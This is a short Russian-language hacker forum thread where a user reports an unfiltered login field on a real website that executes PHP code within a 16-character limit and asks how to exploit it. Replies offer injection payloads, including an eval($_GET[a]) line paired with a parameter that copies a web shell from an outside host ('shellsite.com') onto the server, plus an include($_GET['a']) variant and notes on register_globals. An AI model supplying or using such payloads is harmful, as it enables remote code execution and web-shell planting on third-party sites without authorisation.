16 символов :(
 

На одном ресе обнаружил такую штуку: когда входишь на сайт то на странице пишется "Привет ЛОГИН". так вот, при регистрации в поле логин никакой фильтрации нет и можно указывать любые символы. Облом лишь в том что обработчик формы не регает логины больше 16 символов! :mad:

Подскажите как можно использовать эту уязвимость. работает phpinfo() sleep(), а больше не хватает у меня ни фантазии ни символов

При register_globals=ON
Потом в GET['a'] - путь к шеллу

Вроде же.
Что то я непробывал просто так присваивать массиву из ниоткуда, что бы он брал из GET запроса.
Или я видимо ещё незнал об этом.
Если твой пример правильный, дико извеняюсь ;)

какбе

eval($_GET[a]); &a=copy('http://shellsite.com/shell.txt','shell.php'); ну в этом стиле.

include($_GET['a']) - больше 16 какбе
регистер глобалс по дефолту включён какбе

включен на таких версиях старых что поискать надо:

чёта у меня в на локалхосте по дефолту он был, пшп 5

По дефолту уже давно офф, а в шестой версии вроде и вовсе отключат.

МБ сам включил и подзабыл(бывает такое дистр сохранил и прям в нем поизменял) ну или в денвер/xamp/прочая нежить был поставлен в on а так с 4.2.0 в офф он по дефолту.